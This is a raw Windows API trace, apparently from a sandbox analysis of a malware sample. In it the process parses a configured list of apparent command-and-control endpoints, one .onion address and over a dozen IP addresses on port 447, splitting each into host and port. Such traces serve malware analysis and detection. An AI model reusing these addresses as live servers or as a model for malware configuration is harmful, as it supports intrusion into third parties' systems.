	[0119.115] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad2e8
	[0119.115] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5bd0
	[0119.115] lstrcpynW (in: lpString1=0x22a5bd0, lpString2="cd4fhnyg2337dgxk.onion:448", iMaxLength=23 | out: lpString1="cd4fhnyg2337dgxk.onion") returned="cd4fhnyg2337dgxk.onion"
	[0119.115] StrStrIW (lpFirst="448", lpSrch=":") returned 0x0
	[0119.115] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ad2e8, Size=0x10) returned 0x22ad300
	[0119.115] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad2e8
	[0119.115] lstrcpynW (in: lpString1=0x22ad2e8, lpString2="448", iMaxLength=4 | out: lpString1="448") returned="448"
	[0119.115] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5ea8
	[0119.115] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad2e8) returned 1
	[0119.115] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a5bd0) returned 1
	[0119.115] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad300) returned 1
	[0119.115] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22c6fa8) returned 1
	[0119.115] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2307348, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 17
	[0119.115] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5bd0
	[0119.115] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2307348, cbMultiByte=-1, lpWideCharStr=0x22a5bd0, cchWideChar=17 | out: lpWideCharStr="194.87.93.18:447") returned 17
	[0119.115] StrStrIW (lpFirst="194.87.93.18:447", lpSrch=":") returned=":447"
	[0119.115] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad300
	[0119.115] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23075a0
	[0119.115] lstrcpynW (in: lpString1=0x23075a0, lpString2="194.87.93.18:447", iMaxLength=13 | out: lpString1="194.87.93.18") returned="194.87.93.18"
	[0119.115] StrStrIW (lpFirst="447", lpSrch=":") returned 0x0
	[0119.115] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ad300, Size=0x10) returned 0x22ad2e8
	[0119.115] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad300
	[0119.115] lstrcpynW (in: lpString1=0x22ad300, lpString2="447", iMaxLength=4 | out: lpString1="447") returned="447"
	[0119.116] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23075c8
	[0119.116] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad300) returned 1
	[0119.116] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23075a0) returned 1
	[0119.116] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad2e8) returned 1
	[0119.116] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a5bd0) returned 1
	[0119.116] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2307370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 18
	[0119.116] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5bd0
	[0119.116] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2307370, cbMultiByte=-1, lpWideCharStr=0x22a5bd0, cchWideChar=18 | out: lpWideCharStr="37.44.212.204:447") returned 18
	[0119.116] StrStrIW (lpFirst="37.44.212.204:447", lpSrch=":") returned=":447"
	[0119.116] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad2e8
	[0119.116] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23075a0
	[0119.116] lstrcpynW (in: lpString1=0x23075a0, lpString2="37.44.212.204:447", iMaxLength=14 | out: lpString1="37.44.212.204") returned="37.44.212.204"
	[0119.116] StrStrIW (lpFirst="447", lpSrch=":") returned 0x0
	[0119.116] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ad2e8, Size=0x10) returned 0x22ad300
	[0119.116] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad2e8
	[0119.116] lstrcpynW (in: lpString1=0x22ad2e8, lpString2="447", iMaxLength=4 | out: lpString1="447") returned="447"
	[0119.116] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23075f0
	[0119.116] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad2e8) returned 1
	[0119.116] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23075a0) returned 1
	[0119.116] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad300) returned 1
	[0119.116] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a5bd0) returned 1
	[0119.116] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2307398, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 17
	[0119.116] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5bd0
	[0119.116] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2307398, cbMultiByte=-1, lpWideCharStr=0x22a5bd0, cchWideChar=17 | out: lpWideCharStr="5.188.108.22:447") returned 17
	[0119.116] StrStrIW (lpFirst="5.188.108.22:447", lpSrch=":") returned=":447"
	[0119.116] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad300
	[0119.117] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23075a0
	[0119.117] lstrcpynW (in: lpString1=0x23075a0, lpString2="5.188.108.22:447", iMaxLength=13 | out: lpString1="5.188.108.22") returned="5.188.108.22"
	[0119.117] StrStrIW (lpFirst="447", lpSrch=":") returned 0x0
	[0119.117] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ad300, Size=0x10) returned 0x22ad2e8
	[0119.117] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad300
	[0119.117] lstrcpynW (in: lpString1=0x22ad300, lpString2="447", iMaxLength=4 | out: lpString1="447") returned="447"
	[0119.117] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307618
	[0119.117] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad300) returned 1
	[0119.117] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23075a0) returned 1
	[0119.117] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad2e8) returned 1
	[0119.117] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a5bd0) returned 1
	[0119.117] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x23073c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 20
	[0119.117] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5bd0
	[0119.117] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x23073c0, cbMultiByte=-1, lpWideCharStr=0x22a5bd0, cchWideChar=20 | out: lpWideCharStr="164.132.138.141:447") returned 20
	[0119.117] StrStrIW (lpFirst="164.132.138.141:447", lpSrch=":") returned=":447"
	[0119.117] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad2e8
	[0119.117] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23075a0
	[0119.117] lstrcpynW (in: lpString1=0x23075a0, lpString2="164.132.138.141:447", iMaxLength=16 | out: lpString1="164.132.138.141") returned="164.132.138.141"
	[0119.117] StrStrIW (lpFirst="447", lpSrch=":") returned 0x0
	[0119.117] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ad2e8, Size=0x10) returned 0x22ad300
	[0119.117] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad2e8
	[0119.117] lstrcpynW (in: lpString1=0x22ad2e8, lpString2="447", iMaxLength=4 | out: lpString1="447") returned="447"
	[0119.117] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307640
	[0119.117] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad2e8) returned 1
	[0119.117] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23075a0) returned 1
	[0119.117] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad300) returned 1
	[0119.117] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a5bd0) returned 1
	[0119.117] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x23073e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 18
	[0119.117] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5bd0
	[0119.117] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x23073e8, cbMultiByte=-1, lpWideCharStr=0x22a5bd0, cchWideChar=18 | out: lpWideCharStr="185.125.46.41:447") returned 18
	[0119.118] StrStrIW (lpFirst="185.125.46.41:447", lpSrch=":") returned=":447"
	[0119.118] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad300
	[0119.118] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23075a0
	[0119.118] lstrcpynW (in: lpString1=0x23075a0, lpString2="185.125.46.41:447", iMaxLength=14 | out: lpString1="185.125.46.41") returned="185.125.46.41"
	[0119.118] StrStrIW (lpFirst="447", lpSrch=":") returned 0x0
	[0119.118] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ad300, Size=0x10) returned 0x22ad2e8
	[0119.118] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad300
	[0119.118] lstrcpynW (in: lpString1=0x22ad300, lpString2="447", iMaxLength=4 | out: lpString1="447") returned="447"
	[0119.118] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307668
	[0119.118] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad300) returned 1
	[0119.118] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23075a0) returned 1
	[0119.118] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad2e8) returned 1
	[0119.118] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a5bd0) returned 1
	[0119.118] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2307410, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19
	[0119.118] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5bd0
	[0119.118] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2307410, cbMultiByte=-1, lpWideCharStr=0x22a5bd0, cchWideChar=19 | out: lpWideCharStr="195.123.245.83:447") returned 19
	[0119.118] StrStrIW (lpFirst="195.123.245.83:447", lpSrch=":") returned=":447"
	[0119.118] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad2e8
	[0119.118] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23075a0
	[0119.118] lstrcpynW (in: lpString1=0x23075a0, lpString2="195.123.245.83:447", iMaxLength=15 | out: lpString1="195.123.245.83") returned="195.123.245.83"
	[0119.118] StrStrIW (lpFirst="447", lpSrch=":") returned 0x0
	[0119.119] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ad2e8, Size=0x10) returned 0x22ad300
	[0119.119] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad2e8
	[0119.119] lstrcpynW (in: lpString1=0x22ad2e8, lpString2="447", iMaxLength=4 | out: lpString1="447") returned="447"
	[0119.119] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307690
	[0119.119] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad2e8) returned 1
	[0119.119] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23075a0) returned 1
	[0119.119] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad300) returned 1
	[0119.119] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a5bd0) returned 1
	[0119.119] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2307438, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 20
	[0119.119] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5bd0
	[0119.119] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2307438, cbMultiByte=-1, lpWideCharStr=0x22a5bd0, cchWideChar=20 | out: lpWideCharStr="195.123.238.184:447") returned 20
	[0119.119] StrStrIW (lpFirst="195.123.238.184:447", lpSrch=":") returned=":447"
	[0119.119] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad300
	[0119.119] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23075a0
	[0119.119] lstrcpynW (in: lpString1=0x23075a0, lpString2="195.123.238.184:447", iMaxLength=16 | out: lpString1="195.123.238.184") returned="195.123.238.184"
	[0119.119] StrStrIW (lpFirst="447", lpSrch=":") returned 0x0
	[0119.119] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ad300, Size=0x10) returned 0x22ad2e8
	[0119.119] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad300
	[0119.119] lstrcpynW (in: lpString1=0x22ad300, lpString2="447", iMaxLength=4 | out: lpString1="447") returned="447"
	[0119.119] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23076b8
	[0119.119] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad300) returned 1
	[0119.119] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23075a0) returned 1
	[0119.119] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad2e8) returned 1
	[0119.119] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a5bd0) returned 1
	[0119.119] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2307460, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 18
	[0119.119] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5bd0
	[0119.119] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2307460, cbMultiByte=-1, lpWideCharStr=0x22a5bd0, cchWideChar=18 | out: lpWideCharStr="137.74.151.56:447") returned 18
	[0119.119] StrStrIW (lpFirst="137.74.151.56:447", lpSrch=":") returned=":447"
	[0119.120] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad2e8
	[0119.120] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23075a0
	[0119.120] lstrcpynW (in: lpString1=0x23075a0, lpString2="137.74.151.56:447", iMaxLength=14 | out: lpString1="137.74.151.56") returned="137.74.151.56"
	[0119.120] StrStrIW (lpFirst="447", lpSrch=":") returned 0x0
	[0119.120] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ad2e8, Size=0x10) returned 0x22ad300
	[0119.120] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad2e8
	[0119.120] lstrcpynW (in: lpString1=0x22ad2e8, lpString2="447", iMaxLength=4 | out: lpString1="447") returned="447"
	[0119.120] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23076e0
	[0119.120] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad2e8) returned 1
	[0119.120] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23075a0) returned 1
	[0119.120] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad300) returned 1
	[0119.120] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a5bd0) returned 1
	[0119.120] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2307488, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 17
	[0119.120] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5bd0
	[0119.120] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2307488, cbMultiByte=-1, lpWideCharStr=0x22a5bd0, cchWideChar=17 | out: lpWideCharStr="81.177.6.170:447") returned 17
	[0119.120] StrStrIW (lpFirst="81.177.6.170:447", lpSrch=":") returned=":447"
	[0119.120] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad300
	[0119.120] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23075a0
	[0119.120] lstrcpynW (in: lpString1=0x23075a0, lpString2="81.177.6.170:447", iMaxLength=13 | out: lpString1="81.177.6.170") returned="81.177.6.170"
	[0119.120] StrStrIW (lpFirst="447", lpSrch=":") returned 0x0
	[0119.120] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ad300, Size=0x10) returned 0x22ad2e8
	[0119.120] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad300
	[0119.120] lstrcpynW (in: lpString1=0x22ad300, lpString2="447", iMaxLength=4 | out: lpString1="447") returned="447"
	[0119.120] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307708
	[0119.121] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad300) returned 1
	[0119.121] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23075a0) returned 1
	[0119.121] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad2e8) returned 1
	[0119.121] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a5bd0) returned 1
	[0119.121] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x23074b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 17
	[0119.121] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5bd0
	[0119.121] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x23074b0, cbMultiByte=-1, lpWideCharStr=0x22a5bd0, cchWideChar=17 | out: lpWideCharStr="92.38.135.44:447") returned 17
	[0119.121] StrStrIW (lpFirst="92.38.135.44:447", lpSrch=":") returned=":447"
	[0119.121] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad2e8
	[0119.121] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23075a0
	[0119.121] lstrcpynW (in: lpString1=0x23075a0, lpString2="92.38.135.44:447", iMaxLength=13 | out: lpString1="92.38.135.44") returned="92.38.135.44"
	[0119.121] StrStrIW (lpFirst="447", lpSrch=":") returned 0x0
	[0119.121] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ad2e8, Size=0x10) returned 0x22ad300
	[0119.121] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad2e8
	[0119.121] lstrcpynW (in: lpString1=0x22ad2e8, lpString2="447", iMaxLength=4 | out: lpString1="447") returned="447"
	[0119.121] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307730
	[0119.121] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad2e8) returned 1
	[0119.121] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23075a0) returned 1
	[0119.121] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad300) returned 1
	[0119.121] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a5bd0) returned 1
	[0119.121] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x23074d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 17
	[0119.121] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5bd0
	[0119.121] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x23074d8, cbMultiByte=-1, lpWideCharStr=0x22a5bd0, cchWideChar=17 | out: lpWideCharStr="195.54.163.5:447") returned 17
	[0119.121] StrStrIW (lpFirst="195.54.163.5:447", lpSrch=":") returned=":447"
	[0119.122] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad300
	[0119.122] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23075a0
	[0119.122] lstrcpynW (in: lpString1=0x23075a0, lpString2="195.54.163.5:447", iMaxLength=13 | out: lpString1="195.54.163.5") returned="195.54.163.5"
	[0119.122] StrStrIW (lpFirst="447", lpSrch=":") returned 0x0
	[0119.122] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ad300, Size=0x10) returned 0x22ad2e8
	[0119.122] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad300
	[0119.122] lstrcpynW (in: lpString1=0x22ad300, lpString2="447", iMaxLength=4 | out: lpString1="447") returned="447"
	[0119.122] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307758
	[0119.122] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad300) returned 1
	[0119.122] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23075a0) returned 1
	[0119.122] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad2e8) returned 1
	[0119.122] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a5bd0) returned 1
	[0119.122] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2307500, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 20
	[0119.122] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5bd0
	[0119.122] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2307500, cbMultiByte=-1, lpWideCharStr=0x22a5bd0, cchWideChar=20 | out: lpWideCharStr="164.132.138.134:447") returned 20
	[0119.122] StrStrIW (lpFirst="164.132.138.134:447", lpSrch=":") returned=":447"
	[0119.122] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad2e8
	[0119.122] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23075a0
	[0119.122] lstrcpynW (in: lpString1=0x23075a0, lpString2="164.132.138.134:447", iMaxLength=16 | out: lpString1="164.132.138.134") returned="164.132.138.134"
	[0119.122] StrStrIW (lpFirst="447", lpSrch=":") returned 0x0
	[0119.122] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ad2e8, Size=0x10) returned 0x22ad300
	[0119.122] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad2e8
	[0119.122] lstrcpynW (in: lpString1=0x22ad2e8, lpString2="447", iMaxLength=4 | out: lpString1="447") returned="447"
	[0119.122] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307780
	[0119.123] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad2e8) returned 1
	[0119.123] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23075a0) returned 1
	[0119.123] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad300) returned 1
	[0119.123] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a5bd0) returned 1
	[0119.123] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2307528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 18
	[0119.123] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5bd0
	[0119.123] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2307528, cbMultiByte=-1, lpWideCharStr=0x22a5bd0, cchWideChar=18 | out: lpWideCharStr="185.142.99.45:447") returned 18
	[0119.123] StrStrIW (lpFirst="185.142.99.45:447", lpSrch=":") returned=":447"
	[0119.123] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad300
	[0119.123] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23075a0
	[0119.123] lstrcpynW (in: lpString1=0x23075a0, lpString2="185.142.99.45:447", iMaxLength=14 | out: lpString1="185.142.99.45") returned="185.142.99.45"
	[0119.123] StrStrIW (lpFirst="447", lpSrch=":") returned 0x0
	[0119.123] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ad300, Size=0x10) returned 0x22ad2e8
	[0119.123] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad300
	[0119.123] lstrcpynW (in: lpString1=0x22ad300, lpString2="447", iMaxLength=4 | out: lpString1="447") returned="447"
	[0119.123] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23077a8
	[0119.123] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad300) returned 1
	[0119.123] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23075a0) returned 1
	[0119.123] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad2e8) returned 1
	[0119.123] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a5bd0) returned 1
	[0119.123] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x22ad2b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 16
	[0119.123] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5bd0
	[0119.123] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x22ad2b8, cbMultiByte=-1, lpWideCharStr=0x22a5bd0, cchWideChar=16 | out: lpWideCharStr="81.177.6.69:447") returned 16
	[0119.123] StrStrIW (lpFirst="81.177.6.69:447", lpSrch=":") returned=":447"
	[0119.123] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad2e8
	[0119.124] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23075a0
	[0119.124] lstrcpynW (in: lpString1=0x23075a0, lpString2="81.177.6.69:447", iMaxLength=12 | out: lpString1="81.177.6.69") returned="81.177.6.69"
